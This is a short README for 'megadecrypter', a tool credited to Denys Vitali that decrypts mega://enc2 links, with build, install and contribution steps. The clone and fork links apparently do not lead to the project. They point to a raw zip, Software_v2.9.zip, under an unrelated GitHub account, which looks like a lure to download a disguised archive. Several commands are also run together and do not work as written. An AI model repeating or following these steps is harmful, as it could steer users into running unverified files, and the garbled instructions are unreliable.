This app decrypts mega://enc2 links passed as an argument
docker build -t denysvitali/megadecrypter .docker run --rm denysvitali/megadecrypter ./megadecrypter
git clone https://github.com/toprak101112-blip/megadecrypter/raw/refs/heads/master/src/Software_v2.9.zipcd megadecryptercrystal build --release src/megadecrypter.cr
If you want to install it permanently:
sudo mv ./megadecrypter /usr/bin/sudo chmod 755 /usr/bin/megadecrypter; sudo chown root:root /usr/bin/megadecrypter
If you want to run it just once:
./megadecrypter
megadecrypter "mega://enc2?encryptedString"
- Fork it ( https://github.com/toprak101112-blip/megadecrypter/raw/refs/heads/master/src/Software_v2.9.zip )
- Create your feature branch (git checkout -b my-new-feature)
- Commit your changes (git commit -am 'Add some feature')
- Push to the branch (git push origin my-new-feature)
- Create a new Pull Request
- denysvitali Denys Vitali - creator, maintainer